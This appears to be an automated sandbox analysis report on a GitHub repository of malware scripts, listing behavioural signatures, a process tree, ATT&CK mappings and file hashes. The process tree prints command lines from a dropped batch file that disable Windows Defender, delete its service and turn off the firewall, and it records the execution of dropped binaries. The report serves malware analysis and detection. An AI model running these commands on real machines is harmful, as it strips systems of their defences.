Analysis
max time kernel: 127s
max time network: 128s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17/11/2024, 08:52
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/SantiagoPujana/MalwareScripts
Resource: win10v2004-20241007-en
General
Target: https://github.com/SantiagoPujana/MalwareScripts
Malware Config
Signatures

Downloads MZ/PE file

Modifies Windows Firewall (2 TTPs, 2 IoCs)
  pid   Process
  3692  netsh.exe
  3456  netsh.exe
Executes dropped EXE (2 IoCs)
  pid   Process
  4384  ScreenMelter.exe
  992   FullMemory.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  pid   Process
  2596  powershell.exe
  1852  powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
  flow  ioc
  30    camo.githubusercontent.com
  31    camo.githubusercontent.com
  32    camo.githubusercontent.com
  61    raw.githubusercontent.com
  62    raw.githubusercontent.com
Launches sc.exe (3 IoCs)
Sc.exe is a Windows utility to control services on the system.
  pid   Process
  4800  sc.exe
  2400  sc.exe
  2480  sc.exe
Event Triggered Execution: Netsh Helper DLL (1 TTPs, 6 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                         Process
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ScreenMelter.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  FullMemory.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                                   Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    chrome.exe

Modifies data under HKEY_USERS (2 IoCs)
  description      ioc                                                                                                    Process
  Key created      \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry                                  chrome.exe
  Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763071872342857"  chrome.exe

Modifies registry class (1 IoCs)
  description  ioc                                                                                    Process
  Key created  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings  chrome.exe

Modifies registry key (1 TTPs, 3 IoCs)
  pid   Process
  1704  reg.exe
  2392  reg.exe
  3248  reg.exe

Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid   Process         entries
  3392  chrome.exe      2
  3752  powershell.exe  3
  2596  powershell.exe  3
  1852  powershell.exe  3
  2536  chrome.exe      4

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (3 IoCs)
  pid   Process     entries
  3392  chrome.exe  3

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                       pid   Process     entries
  Token: SeShutdownPrivilege        3392  chrome.exe  32
  Token: SeCreatePagefilePrivilege  3392  chrome.exe  32
  (the report lists the two token requests alternating, 64 entries in total)

Suspicious use of FindShellTrayWindow (58 IoCs)
  pid   Process     entries
  3392  chrome.exe  58

Suspicious use of SendNotifyMessage (32 IoCs)
  pid   Process     entries
  3392  chrome.exe  32

Suspicious use of WriteProcessMemory (64 IoCs)
  description                       pid   Process     procid_target  entries
  PID 3392 wrote to memory of 2960  3392  chrome.exe  83             2
  PID 3392 wrote to memory of 760   3392  chrome.exe  84             30
  PID 3392 wrote to memory of 4500  3392  chrome.exe  85             2
  PID 3392 wrote to memory of 2108  3392  chrome.exe  86             30
Processes
(child processes are indented under their parent)

C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3392)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2960)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc58

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 760)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4500)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:3

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2108)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1088)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 916)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4412)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 644)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4384)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4864)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2640)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3932)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2016)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3612)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1280)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1

    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2536)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe (PID 532)
  Command line: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\svchost.exe (PID 2760)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\System32\rundll32.exe (PID 1612)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\ScreenMelter.exe (PID 4384)
  Command line: "C:\Users\Admin\Desktop\ScreenMelter.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery

C:\Users\Admin\Desktop\FullMemory.exe (PID 992)
  Command line: "C:\Users\Admin\Desktop\FullMemory.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery

C:\Windows\system32\cmd.exe (PID 396)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "

    C:\Windows\system32\reg.exe (PID 1704)
      Command line: reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      - Modifies registry key

    C:\Windows\system32\reg.exe (PID 2392)
      Command line: reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      - Modifies registry key

    C:\Windows\system32\reg.exe (PID 3248)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f
      - Modifies registry key

    C:\Windows\system32\gpupdate.exe (PID 3180)
      Command line: gpupdate /force

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3752)
      Command line: powershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\sc.exe (PID 4800)
      Command line: sc stop WinDefend
      - Launches sc.exe

    C:\Windows\system32\sc.exe (PID 2400)
      Command line: sc query WinDefend
      - Launches sc.exe

    C:\Windows\system32\sc.exe (PID 2480)
      Command line: sc delete WinDefend
      - Launches sc.exe

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2596)
      Command line: powershell.exe Set-NetFirewallProfile -Enabled False
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1852)
      Command line: powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\netsh.exe (PID 3692)
      Command line: netsh advfirewall set allprofiles state off
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

    C:\Windows\system32\netsh.exe (PID 3456)
      Command line: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
Network
MITRE ATT&CK Enterprise v15
(technique and sub-technique counts in parentheses)

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  System Services (1)
    Service Execution (1)
Persistence
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Privilege Escalation
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Defense Evasion
  Impair Defenses (2)
    Disable or Modify System Firewall (1)
  Modify Registry (1)
Downloads

Filesize: 649B
MD5: 073d2d1f5afb5732236e939c0f259453
SHA1: 8bf64fccb5a35df236f322ce95de1dd19a31a5a1
SHA256: c8e860634b94e4a52bdc84987fb8311deaf0d6704fad629b8ff553a1a511069e
SHA512: 21dc80ce515562eeb520463a43e84b5e26a3604504091c47c5ee377c06afe9d71d732f6ed4f952682828a78e986819585156e5fdd7e20309739b001f1e1f2530

Filesize: 215KB
MD5: e579aca9a74ae76669750d8879e16bf3
SHA1: 0b8f462b46ec2b2dbaa728bea79d611411bae752
SHA256: 6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf
SHA512: df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Filesize: 2KB
MD5: 9bd40c38355785a81c6710b7e96decf6
SHA1: 091fa9e4c17177a764ac1160984decb8d8e08bb8
SHA256: 0c73b86d0ab84ef87e670c8f7b4a5334b42dae4a6ca813dcc2b1f0ae7148db39
SHA512: ff4768953b7eb3f6838bfc885dc578e6efa8bd4a04892e843b9b866dc1677d1861dff816b3b0294592e70bcb7493aa724c81584d9da8806fdb06879ea66114f3

Filesize: 2KB
MD5: 3bda54957329399e01369d366d01868b
SHA1: 57b7c4ab48ee910bda91bab3d3ae3e938f0d0148
SHA256: c5cf894c14c37c6b34a9c32365767a53b73c1ad554664c980ffed693258b1757
SHA512: 0221e125ee31169c12ad8dbaf27b3c09eabbb220a52c6ae8d332141c3f0223d037702dc058f582a86d92ba44819f9c25f18be7ae87f8b67dd5790a5ee6d79e20

Filesize: 2KB
MD5: d8d5b44fb839ede3d75feda67fa99c71
SHA1: 4b633eee81202091940d2be98bfa1141bfc8754f
SHA256: e2c84b67be6e3a97126451d1d4073a8beb171b1df0df955e40a8a2c964c9f4f5
SHA512: 6cc2d8ead16814a0828e4e52fbcbda4b2bed92805b68c4d07f7191fe292e34a514890a4e2e474f0c571a2cea65527c9e22eea0a863a0ccfe3aca556cefbe6641

Filesize: 2B
MD5: d751713988987e9331980363e24189ce
SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Filesize: 1KB
MD5: 3f79900a8ee54ebbc79263af85798e2c
SHA1: 202f1eea059c97cef8e0b9ed4ee6ceb482d917e5
SHA256: 8d25b64ce714dd9f63176b2f6b9c01397c76e2193a8df988bee10a1520972256
SHA512: fae8934040cdab50f89fce1afb54bc2e912efef0f8ad9a3729a4f6344f6685b765b3ea2a2cdbbde245bde4f32c49454af2bc2739f4e33045292abac7a864911b

Filesize: 1KB
MD5: 92d25c80f9e51b974164cf1cef8ff9ac
SHA1: edf7d0477c60b796fbe9bc6ea529730245a885d0
SHA256: 1b989eeb235c944aa0d5faf07990ee47155d38e954a12d3ccbff34b6c83aba2b
SHA512: a74ccb4a283d48bbceab1f90dc59b800b9abd850ec6d5f5cea69c9c1e7b68086aa171bc018bec7e075e1f172f3b59e76611c3b0b4b504be3bc4e62e134927a7d

Filesize: 1KB
MD5: 68103ea7a4503dd93424400eb8cf6685
SHA1: 828412d712bcfeeb940bb7482230b8d1a67f0e40
SHA256: db7fd66761785e06b5ff0b7815b16484ec47d55419ea9a44e9b60289bf1b19ee
SHA512: 9ee3db3df3e73edd20faa9bca68c958db89bdb19ec4113d6388524dd16885452a66c46a769fdc3b3cd46d73287cc3ff88bc3475bae6febc68c2d5229edad8253

Filesize: 1KB
MD5: 21d3f83b943683f20d13b27b8555abbb
SHA1: 3a0602b4b701ac3916abf990d1d48f754c87b75a
SHA256: 8692a9c4971fdf97d106843159799f505cab152407a7d632c560eefa4c33e75a
SHA512: 38197634ad5f4dda5d53d711ae2cdcf7fac7b6bb6c26e24dcf20790abde06c0dcff38ac3d332eed6c393d8cf311aa402d33f4e33072c81058a9b49b28f1910f0

Filesize: 1KB
MD5: da190c584ad1b88fcd51f04685dd218c
SHA1: 1b5d7c1d5cfd2806d39fb80ca97d8c71b24d65eb
SHA256: 2ae4d64370bb0154a140b94f709bb3cb555cf08b40caa4ea4da3d0d7890df39b
SHA512: 0cf93ce7ad4190152c62d2d8661bb25a3feb6cf314fc79d93561088a974c3febbdd61bb287a02c1b7a7cfafa031bcee550238b3e4b9ce7224f9ac38dbf3a7a08

Filesize: 1KB
MD5: ba1d1bce374bf5d57dd33b02a9a13bf8
SHA1: 47b8e855bb9e6b15f610240ff06e4bc9707780f0
SHA256: dc226f71609df0a7bec1ea2b4fbe5250205bddbac74a2e94684b5619b1c16348
SHA512: 95b3b08818818c5c598e4ab52f913e13041b180e5e340993c9cae9391c368911064c3093fd743899206cd5a576b624ec116c27c170d5ca89a7217f4de656a865

Filesize: 10KB
MD5: 1dac7711129c58c4bb96f4ac5887e369
SHA1: 3fe0460d5b525506a7b8c2220d7d2eef636ccb26
SHA256: 04e7920e3bb85d8daf3f229eaa81637d37a12dd4be9df417c8f7967cd33e9d4f
SHA512: a4c420a4028288189b10f52dd6e7a2989668fabd0b3fe972ed918c263a5b2e83d0c43c0d03a3aa3bd0377b0cbc7344aa770ec7f2c7aae2d7040dfa4fac0dacaf

Filesize: 10KB
MD5: 0971dfb36bf506eb1e9e7d6f3d112c33
SHA1: bceed14aacb94e5b5018399beaf81491e11dcf1b
SHA256: dcb18bb8eef41072edd044a3dfc52764688246dba06b8d0fa6e9594fc05e9b0a
SHA512: c3f223f64b3af132cfb89505dee888186803c2cb4c09468c3093d69775dc217bece7f50ba7c93f779a5b95572311e7ee9933a7bdeb8566aad79f57446a1b1fc7

Filesize: 10KB
MD5: 1e0250b216bab7819e7880d2ba2e12a5
SHA1: ca991537aa702ce066f1154355852eb09c378233
SHA256: 467583ce06284a410b1817659d6c040deb17d3d7fccdfcb4a8240ff2a888a6c1
SHA512: 7bcd35237f43e3e828b63abd746d16e7f2934d8694ecdd6ef4c328799bdd84c9090576035515e8779d34c7d1b0bfff1f762db7367fb77ac50c9c00f220eb9f64

Filesize: 9KB
MD5: a116308261e6dc9f7327354ce05586cd
SHA1: 809e52db5a77a97ac22b31e37735034bdb1f77ae
SHA256: e847403fd8daaa42346ead0edcdccac58ef30a7c7b852770d9893ce39f4ed9d4
SHA512: eabb82f592c9dd5fdfb9e491adf3bc43fa377c246d0f946fc52fbf504554a34cc46557aeb4d252ad276f6a58e4e0eb13c7fdc905c82cda5e4ec1504d2320c2b1

Filesize: 9KB
MD5: 08729e18bf59e658dbaa0d544186224f
SHA1: d2331ab2f3c207aba283e9df002b2d763fbe0a6a
SHA256: fff4a524d7f867fda57816b557f75cd8f61f75d420fab691b7157f1b65d13816
SHA512: bf605e079029c97b8dd5403e772bcdd6c18a1325e1f3e77c4ec2bc8fe5145a538152f24d401893359dd52cea93bac3414f1cd82f85b875a5bb302b69adb4de6f

Filesize: 10KB
MD5: b67b469a374cc80ddcfa5f2864784702
SHA1: ed1815c27a6fe6797bbbab1b8cbe7e8346c39676
SHA256: ea560c47f5aa8f56654119e3a71c5c2741ecdf61507b266dd7183689fbdbc9b0
SHA512: 418786d01a82c496900d352b7a990e34aa6f9291308fcae874fef6783715a0d9328ecf6ce3e113fb33b2d19c784dc96b1abcc79499fa5584f4a3da0f2b6019ed

Filesize: 10KB
MD5: 8053ae6f03469e30b8f0113e3df74713
SHA1: 0dbd621c49c94a39383e4e3b37b770e4b4bab5a1
SHA256: 3fd3b3b5be01a87f706d5553018a3a8d0924d07cf7985b6f1b4a29d2ec807bc6
SHA512: 3eacee11a07625bfb2eb84ee9428004a75cea7a54489c6afa2193012cd7dfe9aca02d37d48c1c4380796a4c821ebbebd97977115c52f63a2deb26d88ed4602a3

Filesize: 10KB
MD5: 134980c78a6b4244d50c265689cedca4
SHA1: 18eeeca3de641d06aea7ca3d36eddace378f0d98
SHA256: f86d0a99b685555d4497a8819338a0c6884233cc38d68bbb41c930cf5babf9e5
SHA512: 663158d971d2d4181da56678407a69437baab92c951822e58bab379f11b00cd698ab4939f6e047317168dcba64c809daa550e47b8c371abe2112dad9674030ae

Filesize: 116KB
MD5: 0dc35bc6ef8164a71cab703e6c8e5e2e
SHA1: e6c3b92acd95052fb1e4336ffa52521ffcdc80b3
SHA256: 7ab722c4e93d69d0d0db6f54825cf3419c8cc5acea92f2266661152c96fd8087
SHA512: eecbb7648dd195b7099f813f91e39c29ad74818c239b292aeba9d113665e3b7f2491a2324c67a7e6899cd16046f39c16631dd2a6ae274e4f4626fa9c0e02798b

Filesize: 116KB
MD5: d0e95cba9ed6ce304cb83116b75aed52
SHA1: a47d4c5624a7c25d358828f38320aa1b7207c388
SHA256: 0c809780a7e58e9d0731d28b691bbda673536c3960f1e54c71352e425017e428
SHA512: b7de8a369c508aa355fd9d79c97c84625f5d10140dd62843dd86a377222a792e8fb38a7339732b8d39ff9d36f62f693767903e7ef6e675710587efe1699aef52

Filesize: 3KB
MD5: 92f89789864052cac0862ed6b4f1e706
SHA1: aa6594951427e103fa025c8ebef3ec5a5f85866c
SHA256: 73123d6e562b26b1fd2cf4fece67930d95fc4738bad8d1f386345a5311274739
SHA512: 71a0261ee6ffcd2e9bb336dde7110f80ac6fa01df5433e77cc170649b7936653d89229255fbeac15692e8736c9f3e5d15d62b2372865fe3d7ab933c511c2894e

Filesize: 1KB
MD5: 7d28c7b63ed6134229fe24f4c4830521
SHA1: df820f1db7c236d72b47b54c68a16fbe942166da
SHA256: 2adc156088f2d6759104e0f1b92d6c2acbb9f778d9d27f1d1e1e7341f274c68c
SHA512: c5602f04031381f9e8935496dff5c574c7d0a562d0ec8b01e26ee8bdc42068c823bc731f818a4c1c39968a0b648bebced9a31e0fd81e12c40d1026effba14e87

Filesize: 1KB
MD5: 2200b65769051ec799e0541b887af28f
SHA1: 34871de84f7c0e032b941dcac1bfb2b7704cf013
SHA256: 88ad446bc5bc9ecc2ff23c1eccd3591056f57a41c3f6aa2eb7f4e826bfe4a82f
SHA512: fcaaf2d1e3b30c73f873d0e2671e93f0cf371cf7d0afc2d0c0dd6a6f1527666015a0bf89afff9ba849cc81c3d155a262fc6360fbdabaf76b0b6ee9d7eb6497ec

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 5KB
MD5: 2baf7f332b19d0a534fea218c84de722
SHA1: 5b507b59151681f0be1b91679450413b97cb1baa
SHA256: 15d7b954ce8ec43a28b4d9df7082e511d0bcecba6a19169d17d41a41ca8769f2
SHA512: 09f84942cd8ca020364db5efe1fe61e7ca862d5bdada7568f0c8fadaa35c16632bb20c1fe946d1578c0b17728e442e1baf996ea2b6ac19ab1e3ed228662e13c2

Filesize: 39KB
MD5: 56dbd0fc7e98607b73306cf8551ba7d3
SHA1: 7c3c297a08636cd94a5f4e61f5970f85beec53ab
SHA256: a489e7dc06ba4ef9572b66acfecf89c62d6b5c3d35b0ecb216aee2a4cd475498
SHA512: 04be2153762e4a1ac20618d7a2980d7e92f4db7e951f9e754f30a4c2bf4f098443aafa2c8c9221584668d99a144869b30b7ef40c3acdb798cf2d6ddf0b6f2ed8

Filesize: 41KB
MD5: cefcd3f182b98087ae20ce34a1f5989b
SHA1: ab8640bc9bb611d1fa43eced8410595c8c41d17b
SHA256: e7923e3e77348cd5046e0f4a9859ff991933945c41e9771d00e2bdec1e1267d9
SHA512: be161799e3606cc32ccd49976f63d6c1c7ffaef4f6769e58c8653fb0ea56351ea3c2113021483cb970834784b74763f9c4ba89fc1bacfccf7e6766c83b9c69d8